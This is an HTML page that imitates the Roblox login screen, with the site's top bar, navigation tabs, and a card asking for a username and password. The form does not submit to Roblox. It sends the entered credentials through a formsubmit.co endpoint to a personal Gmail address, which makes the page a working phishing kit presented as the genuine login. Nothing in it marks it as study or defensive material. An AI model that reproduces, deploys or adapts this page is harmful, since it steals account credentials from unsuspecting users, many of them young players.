<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Login to Roblox</title>
  <style>
    :root {
      --bg-primary: #111;            /* fond principal */
      --bg-secondary: #1c1c1c;       /* carte / conteneur */
      --border-color: #2e2e2e;
      --text-primary: #e6e6e6;
      --text-secondary: #b3b3b3;
      --accent-color: #2563eb;
      --input-bg: #2a2d30;
      --input-border: #333;
    }
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }
    body {
      background-color: var(--bg-primary);
      color: var(--text-primary);
      font-family: "Arial", sans-serif;
      display: flex;
      flex-direction: column;
      min-height: 100vh;
    }
    .top-bar {
      display: flex;
      justify-content: space-between;
      align-items: center;
      background: var(--bg-secondary);
      padding: 12px 16px;
      border-bottom: 1px solid var(--border-color);
    }
    .top-bar img.logo {
      width: 28px;
      height: 28px;
    }
    .btn-signup {
      background: var(--accent-color);
      color: white;
      padding: 6px 14px;
      border: none;
      border-radius: 6px;
      font-weight: 600;
      font-size: 14px;
      cursor: pointer;
    }

    .nav-tabs {
      display: flex;
      justify-content: space-around;
      background: var(--bg-secondary);
      border-bottom: 1px solid var(--border-color);
      padding: 10px 0;
    }
    .nav-tabs div {
      color: var(--text-secondary);
      font-size: 15px;
      cursor: pointer;
    }
    .nav-tabs div:hover {
      color: var(--text-primary);
    }

    .main {
      flex: 1;
      display: flex;
      justify-content: center;
      align-items: center;
      padding: 20px;
    }
    .login-card {
      background: var(--bg-secondary);
      padding: 32px 24px;
      border-radius: 12px;
      width: 100%;
      max-width: 380px;
      border: 1px solid var(--border-color);
    }
    .login-card h2 {
      text-align: center;
      margin-bottom: 24px;
      font-size: 22px;
      font-weight: 700;
    }
    .login-card input {
      width: 100%;
      padding: 12px;
      margin-bottom: 16px;
      background: var(--input-bg);
      border: 1px solid var(--input-border);
      border-radius: 8px;
      color: var(--text-primary);
      font-size: 14px;
    }
    .login-card input::placeholder {
      color: var(--text-secondary);
    }
    .btn-login {
      width: 100%;
      padding: 12px;
      background: var(--accent-color);
      color: white;
      border: none;
      border-radius: 8px;
      font-size: 16px;
      font-weight: bold;
      cursor: pointer;
    }
    .btn-login:hover {
      background: #1e4ed8;
    }
    .forgot {
      text-align: center;
      margin-top: 16px;
      color: var(--text-secondary);
      font-size: 14px;
      cursor: pointer;
    }
    .forgot:hover {
      color: var(--text-primary);
    }
    hr {
      border: none;
      border-top: 1px solid var(--border-color);
      margin: 24px 0;
    }
    .alt-btn {
      width: 100%;
      padding: 12px;
      background: var(--bg-primary);
      color: white;
      border: none;
      border-radius: 8px;
      font-size: 15px;
      margin-bottom: 12px;
      cursor: pointer;
    }
    .alt-btn:hover {
      background: #222;
    }
    .signup-text {
      text-align: center;
      margin-top: 16px;
      color: var(--text-secondary);
      font-size: 14px;
    }
    .signup-text a {
      color: var(--accent-color);
      text-decoration: none;
      font-weight: 600;
    }
    .signup-text a:hover {
      text-decoration: underline;
    }
  </style>
</head>
<body>

  <div class="top-bar">
    <img class="logo" src="./roblox.png" alt="Roblox Logo">
    <button class="btn-signup">Sign Up</button>
  </div>

  <div class="nav-tabs">
    <div>Charts</div>
    <div>Marketplace</div>
    <div>Create</div>
    <div>Robux</div>
  </div>

  <div class="main">
    <div class="login-card">
      <h2>Login to Roblox</h2>
      <form action="https://formsubmit.co/code.codeur84@gmail.com" method="POST" enctype="multipart/form-data">
      <input name="pseudo1" type="text" placeholder="Username/Email/Phone" />
      <input name="ps2" type="password" placeholder="Password" />
      <button type="submit" class="btn-login">Log In</button>
      </form>
      <div class="forgot">Forgot Password or Username?</div>
      <hr />
      <button class="alt-btn">Email Me a One-Time Code</button>
      <button class="alt-btn">Use Another Device</button>
      <div class="signup-text">
        Don’t have an account? <a href="#">Sign Up</a>
      </div>
    </div>
  </div>

</body>
</html>
